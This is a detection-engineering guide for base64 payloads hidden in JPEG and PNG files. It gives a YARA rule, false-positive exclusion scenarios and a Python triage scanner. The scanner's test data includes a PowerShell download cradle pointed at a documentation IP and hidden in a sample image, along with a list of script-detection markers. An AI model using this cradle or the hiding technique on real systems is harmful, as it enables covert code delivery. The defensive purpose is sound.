Adversaries may embed base64-encoded payloads within image files to exfiltrate data or to stage code that a separate loader later decodes and executes; image files are rarely inspected beyond their extension or MIME type, so they make a convenient carrier. SOC teams should proactively hunt for this behavior, for example in Microsoft Sentinel (formerly Azure Sentinel), to identify data exfiltration or command-and-control channels disguised as benign image files.
YARA Rule
rule base64_hidden_in_image
{
    strings:
        // ASCII anchor followed by 32 base64 characters ('+' added to the class; '-' kept for base64url)
        $b64_run = /JPEG-1\.1[A-Za-z0-9+\/\-]{32}/
    condition:
        (uint16(0) == 0xD8FF or uint32(0) == 0x474E5089) and any of them   // JPEG (FF D8) or PNG (89 'PNG') header
}
Before deploying this rule, confirm that the literal anchor "JPEG-1.1" actually occurs in your image population: a standard JFIF APP0 segment carries the ASCII text "JFIF" followed by binary version bytes (0x01 0x01), not the text "JPEG-1.1", so the anchor may never fire on ordinary JPEGs, and the rule is best treated as a starting point for a base64-run heuristic rather than a finished signature. The following benign scenarios can also produce base64 runs inside image files; each lists a suggested exclusion, and every exclusion should be scoped as narrowly as possible (exact path or file hash) so it does not also hide the malicious case.
Scenario: Image used in a CI/CD pipeline for artifact storage
Description: A developer uploads an image file to a CI/CD system (e.g., GitHub Actions, GitLab CI) as part of a build artifact; build tooling may write base64 data into the image's metadata segments (for example an embedded thumbnail or a build manifest).
Filter/Exclusion: Exclude files by the pipeline's known artifact path or by a pipeline-specific tag such as ci_cd_pipeline; the presence of .git or .build directories in the file path is a weaker signal, since an attacker can place files there too. Spot-check that the decoded content is what the pipeline is expected to write (a thumbnail, a manifest) and not a script or command line before adding the exclusion.
Scenario: Scheduled backup job includes base64-encoded configuration files
Description: A scheduled backup job (e.g., built around rsync, Veeam, or Duplicity) stores base64-encoded configuration files inside image files as part of a custom packaging or encoding step. None of these tools do this on their own, so if it happens in your environment it is the result of a custom wrapper and should be documented explicitly.
Filter/Exclusion: Exclude files that match the backup job's known output patterns (e.g., backup_*.tar.gz) or that carry the job's own naming convention in the file name or path; prefer excluding by exact output directory and file hash over a bare name pattern, which is trivial for an attacker to mimic.
Scenario: Admin uses an image file to store base64-encoded credentials for internal tools
Description: An administrator encodes credentials (e.g., for a Kubernetes secret or a service account) in base64 and stores them inside an image file, intending it as a form of obscured storage. Base64 is an encoding, not encryption, and a hidden file is not a secrets store: this practice is itself a finding that should be corrected (move the material to a proper secrets manager), not merely excluded.
Filter/Exclusion: Do not blanket-exclude files created or modified by admin, sudo, or root users; that is exactly the access level an intruder operates at, and such an exclusion would blind the hunt. If a specific file must be tolerated until it is remediated, exclude it by exact path and file hash and record the owner and removal date.
Scenario: Image file used for embedding base64 data in a custom application
Description: A custom application (e.g., a legacy .NET or Java app) uses base64 encoding to embed data (e.g., certificates, keys) within image files that ship with or are generated by the application.
Filter/Exclusion: Exclude the specific resource files the application is known to use, identified by path and file hash; if the application regenerates these files, exclude by path plus the expected decoded content type (for example, the decoded data should be a DER certificate rather than a script) so that a replaced file still surfaces.
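The scanner below is an added example, not code from the original page; it ties together the YARA heuristic above (a long run of base64 characters inside an image file) and the exclusion scenarios just listed. It finds base64 runs in JPEG or PNG data, decodes each run, labels what the decoded bytes most likely are (a script or command line, an embedded thumbnail, opaque binary such as key material, or plain text), and then applies path-glob and file-hash exclusions before ranking the remaining findings. The script markers, the 0.9 printable-ratio threshold, the severity ordering and the allowlist patterns are assumptions to tune; all sample images are constructed inline, and 198.51.100.7 is a documentation address, not a real host.

```python
"""Hunt for base64 runs inside image files and triage what they decode to.
Added example, not the page's own code. Markers, thresholds and allowlist
patterns are assumptions; sample images are constructed inline."""
import base64
import binascii
import fnmatch
import hashlib
import re
import string
from dataclasses import dataclass

JPEG_MAGIC = b"\xff\xd8\xff"            # SOI followed by the next marker's 0xFF
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# RFC 4648 alphabet with optional padding; 32 chars is the page's threshold.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{32,}={0,2}")
PRINTABLE = set(string.printable.encode())
# Assumed triage markers; extend them from your own detections.
SCRIPT_MARKERS = (b"powershell", b"invoke-", b"cmd.exe", b"/bin/sh", b"bash -c",
                  b"eval(", b"base64 -d", b"http://", b"https://")
# Most actionable first; used to sort triage output.
SEVERITY = {"suspicious": 0, "undecodable": 1, "plain_text": 2,
            "opaque_binary": 3, "embedded_image": 4}


@dataclass
class Finding:
    path: str
    offset: int
    run_length: int
    verdict: str
    preview: str


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def classify_payload(decoded: bytes) -> str:
    """Label a decoded base64 run by what it most likely is."""
    if decoded.startswith(JPEG_MAGIC) or decoded.startswith(PNG_MAGIC):
        return "embedded_image"      # XMP/EXIF thumbnails: common and benign
    printable = sum(b in PRINTABLE for b in decoded) / max(len(decoded), 1)
    if printable < 0.9:
        return "opaque_binary"       # keys, certificates, compressed data: needs a look
    if any(m in decoded.lower() for m in SCRIPT_MARKERS):
        return "suspicious"          # command line, downloader or interpreter call
    return "plain_text"


def scan_image(path: str, data: bytes) -> list[Finding]:
    """Find and decode every base64 run in one image; non-images are skipped."""
    if not (data.startswith(JPEG_MAGIC) or data.startswith(PNG_MAGIC)):
        return []
    findings = []
    for m in B64_RUN.finditer(data):
        run = m.group().rstrip(b"=")
        try:
            # Re-pad, then decode strictly; a greedy run that swallowed a
            # neighbouring alphabet byte shows up here as undecodable.
            decoded = base64.b64decode(run + b"=" * (-len(run) % 4), validate=True)
            verdict = classify_payload(decoded)
        except binascii.Error:
            decoded, verdict = b"", "undecodable"
        findings.append(Finding(path, m.start(), len(m.group()), verdict,
                                decoded[:40].decode("ascii", "replace")))
    return findings


def triage(files: dict[str, bytes], allow_paths=(), allow_sha256=()) -> list[Finding]:
    """Drop files matching known paths or known hashes, then rank the rest."""
    results = []
    for path, data in files.items():
        if any(fnmatch.fnmatch(path, pat) for pat in allow_paths):
            continue
        if sha256_hex(data) in allow_sha256:
            continue
        results.extend(scan_image(path, data))
    return sorted(results, key=lambda f: SEVERITY[f.verdict])


def jpeg_with_comment(payload: bytes) -> bytes:
    """Constructed minimal JPEG: SOI, JFIF APP0, a COM segment carrying payload, EOI."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    com = b"\xff\xfe" + (len(payload) + 2).to_bytes(2, "big") + payload
    return b"\xff\xd8" + app0 + com + b"\xff\xd9"


# Constructed samples (198.51.100.7 is a documentation address, not a real host).
PS_CMD = (b"powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
          b".DownloadString('http://198.51.100.7/stage')\"")
THUMB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 20   # decodes to a JPEG header
KEYISH = bytes(range(0, 90, 2))                                # 45 opaque bytes
SAMPLE_FILES = {
    "uploads/photo.jpg": jpeg_with_comment(b"shot on phone"),
    "uploads/avatar.jpg": jpeg_with_comment(base64.b64encode(PS_CMD)),
    "uploads/edited.jpg": jpeg_with_comment(b"xmpGImg:image=" + base64.b64encode(THUMB)),
    "build/artifacts/logo.jpg": jpeg_with_comment(base64.b64encode(KEYISH)),
}

if __name__ == "__main__":
    # CI/CD artifact path excluded, as in the first scenario above.
    for f in triage(SAMPLE_FILES, allow_paths=("build/artifacts/*",)):
        print(f"{f.verdict:14} {f.path} @{f.offset} len={f.run_length} {f.preview!r}")
```

Run as-is, the script reports the avatar file as suspicious (the run decodes to a PowerShell download cradle) and the edited file as an embedded image (an XMP-style thumbnail, one of the most common benign sources of base64 in photos), while the CI/CD artifact is dropped by the path exclusion. Only a quarter of byte values fall in the base64 alphabet, so a 32-character run almost never occurs by chance inside entropy-coded JPEG or zlib-compressed PNG data; matches come from ASCII metadata segments (EXIF, XMP, COM), which is where tuning effort belongs. Decoding with validate=True is deliberate: a run that has swallowed an adjacent alphabet byte, or one that is not base64 at all, is surfaced as undecodable rather than silently producing garbage.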